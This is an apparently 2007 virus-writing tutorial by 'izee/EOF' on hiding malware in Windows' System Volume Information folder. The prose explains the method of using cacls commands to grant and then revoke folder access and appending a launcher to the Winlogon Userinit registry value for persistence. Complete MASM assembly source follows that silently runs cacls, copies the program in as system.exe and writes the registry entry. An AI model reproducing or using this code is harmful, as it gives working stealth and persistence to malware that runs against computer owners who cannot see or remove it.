================================== Hide in System Volume Information January 13, 2007 by izee/EOF ================================== 1. Intro 2. Explaining 3. Code 4. Exit ======= 1.Intro ======= This technique shows how we can better hide our malware in a System Volume Information folder, an idea comes to me after reading berniee's article "Explaining the usage of pipes in VX coding", you can read it in berniee's homepage, or in rRlf#7, so a big thanx for that! Greetings to Nibble, DiA, and Retro for some beta testings and help. Enjoy ;) ============ 2.Explaining ============ The scheme of tech is very simple: Using cacls.exe we remove SVI folder privileges by this command: cacls "C:\System Volume Information" /E /G Username:F after we do so, we copy ourselfs there as system.exe (it's can be any other filename), and closin priviliges by this command: cacls "C:\System Volume Information" /E /R Username After those procedures we must set somethin to registry startup key, i choosed Userinit, u can any else, if you choose Userinit too, then Userinit value data must be: Sysdirpath\Userinit.exe,cacls "C:\System Volume Information" /E /G Username,C:\System Volume Information\system.exe as you see we don't touch "Sysdirpath\Userinit.exe,", let it be here, we just add some our data. During system startup this command removes SVI folder privileges: cacls "C:\System Volume Information" /E /G Username then our malware executes from SVI folder and closes privileges: C:\System Volume Information\system.exe If a user will try to access SVI folder, he will probably get an error that access is denied. And before code, i want tell you something, that this tech will probably worx only on NTFS (NT FILE SYSTEM) formatted HDDs, not on FAT32. ======= 3. Code ======= .686 .model flat,stdcall option casemap:none include \masm32\include\windows.inc include \masm32\include\kernel32.inc include \masm32\include\user32.inc include \masm32\include\advapi32.inc include \masm32\include\shlwapi.inc includelib \masm32\lib\advapi32.lib includelib \masm32\lib\shlwapi.lib includelib \masm32\lib\kernel32.lib includelib \masm32\lib\user32.lib .data gunbuf db 32 dup (0) gunsize dd 32d setprivs db 'cacls "C:\System Volume Information" /E /R ', 100 dup (0) unsetprivs db 'cacls "C:\System Volume Information" /E /G ', 100 dup (0) gmfn_pathbuff db 100 dup (0) gmfn_sizebuff dd 100d pathtodrop db "C:\System Volume Information\system.exe", 0 dropedexe db ",C:\System Volume Information\system.exe", 0 fsign db ':F',0 regbuf db 200 dup (0) userinit db "\userinit.exe,",0 regkey db 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',0 regval db 'Userinit',0 msgtext db 'Hello from System Volume Information',0 msgtitle db 'SVI Hide Techique',0 .data? pipe_r dd ? pipe_w dd ? s_attr SECURITY_ATTRIBUTES <> s_info STARTUPINFO <> p_info PROCESS_INFORMATION <> .code start: invoke GetUserName, ;get user name addr gunbuf, ;name buffer addr gunsize ;size buffer invoke lstrcat, ;add to string: addr unsetprivs, ;cacls "C:\System Volume Information" /E /G addr gunbuf ;geted username invoke lstrcat, ;add to string: addr unsetprivs, ;cacls "C:\System Volume Information" /E /G Username addr fsign ;:F sign mov s_attr.lpSecurityDescriptor,\ ;move default security descriptor to SECURITY_ATTRIBUTES NULL mov s_attr.bInheritHandle,\ ;inherite the handle TRUE mov s_attr.nLength,\ ;size of SECURITY_ATTRIBUTES structure sizeof SECURITY_ATTRIBUTES invoke CreatePipe, addr pipe_r, ;pipe read handle addr pipe_w, ;pipe write handle addr s_attr, ;SECURITY_ATTRIBUTES NULL ;default buffer size or eax,eax ;if zero in eax (if error) jz exit ;jump to exit label (quit) mov s_info.cb,\ ;size of STARTUPINFO structure sizeof STARTUPINFO mov eax,\ ;move pipe_w to eax register pipe_w mov s_info.hStdOutput,\ ;move from eax pipe_w to standard output handle in STARTUPINFO structure eax mov s_info.hStdError,\ ;move from eax pipe_w to standard error handle in STARTUPINFO structure eax mov s_info.dwFlags,\ ;move dwFlags to STARTUPINFO structure STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES ;enable wShowWindow parameter, and start app (cacls) with standart privileges mov s_info.wShowWindow,\ ;move wShowWindow parameter to STARTUPINFO structure SW_HIDE ;hide the console window invoke CreateProcess, ;unset SVI privileges NULL, addr unsetprivs, NULL, NULL, TRUE, NULL, NULL, NULL, addr s_info, ;STARTUPINFO structure addr p_info ;PROCESS_INFORMATION structure or eax,eax ;if zero in eax (if error) jz exit ;jump to exit label (quit) invoke CloseHandle, ;Close the handle pipe_w ;of pipe_w invoke Sleep, ;we must sleep little bit before CloseHandle completes 100h ;256 miliseconds enough invoke GetModuleFileName, ;Get full path of this app NULL, ;filename handle addr gmfn_pathbuff, ;buffer for path addr gmfn_sizebuff ;size of buffer invoke CopyFileA, ;Copy this app addr gmfn_pathbuff, ;from current dir addr pathtodrop, ;to C:\System Volume Information TRUE ;don't copy if file already exists invoke lstrcat, addr setprivs, ;add to string: cacls "C:\System Volume Information" /E /R addr gunbuf ;geted username invoke CreateProcess, ;set SVI privileges NULL, addr setprivs, NULL, NULL, TRUE, NULL, NULL, NULL, addr s_info, ;STARTUPINFO structure addr p_info ;PROCESS_INFORMATION structure invoke GetSystemDirectory, ;Get system dir addr regbuf, ;add sys dir path to buffer 256 ;MAX_PATH invoke lstrcat, ;add to addr regbuf, ;sysdir path: addr userinit ;\userinit.exe, invoke lstrcat, ;add to string: addr regbuf, ;Sysdirpath\Userinit.exe, addr unsetprivs ;cacls "C:\System Volume Information" /E /G Username invoke lstrcat, ;add to string: addr regbuf, ;Sysdirpath\Userinit.exe,cacls "C:\System Volume Information" /E /G Username addr dropedexe ;,C:\System Volume Information\system.exe invoke SHSetValue, HKEY_LOCAL_MACHINE, ;type of hive addr regkey, ;path to key addr regval, ;value name 1, ;REG_SZ addr regbuf, ;data 256 ;Lenght of data invoke MessageBox, ;drop some msgbox just for test after reboot NULL, addr msgtext, addr msgtitle, MB_OK + MB_ICONINFORMATION yourcode: ;... exit: ret ;return to Windows ;) end start ====== 4.Exit ====== I hope you liked the tech, if you have something to say drop it to: izee.vx@gmail.com See you!